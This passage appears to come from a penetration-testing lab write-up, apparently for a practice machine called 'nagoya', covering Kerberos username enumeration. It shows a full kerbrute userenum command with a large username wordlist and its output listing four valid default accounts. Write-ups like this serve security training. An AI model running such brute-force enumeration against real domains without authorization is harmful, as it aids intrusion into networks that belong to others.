Kerbereos
Nmap discovered a KDC service on the target ports 88 and 464
The running service is Microsoft Windows Kerberos
Username Enumeration
While I do not know the naming convention that the target domain uses, I will attempt to enumerate usernames as much as possible by brute-forcing the KDC I will get that running in the background while enumerating other services for efficiency
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute userenum --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t 200
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
2025/04/23 14:26:24 > Using KDC(s):
2025/04/23 14:26:24 > nagoya.nagoya-industries.com:88
2025/04/23 14:26:24 > [+] VALID USERNAME: administrator@NAGOYA-INDUSTRIES.COM
2025/04/23 14:26:26 > [+] VALID USERNAME: Administrator@NAGOYA-INDUSTRIES.COM
2025/04/23 14:26:39 > [+] VALID USERNAME: nagoya@NAGOYA-INDUSTRIES.COM
2025/04/23 14:28:41 > [+] VALID USERNAME: Nagoya@NAGOYA-INDUSTRIES.COM
2025/04/23 14:56:57 > Done! Tested 8295455 usernames (4 valid) in 1832.725 secondsI had kerbrute running in the background for awhile. Only defaults